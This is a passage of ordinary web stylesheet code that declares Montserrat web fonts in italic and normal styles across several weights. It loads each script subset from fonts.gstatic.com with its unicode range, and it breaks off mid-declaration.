*/@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: 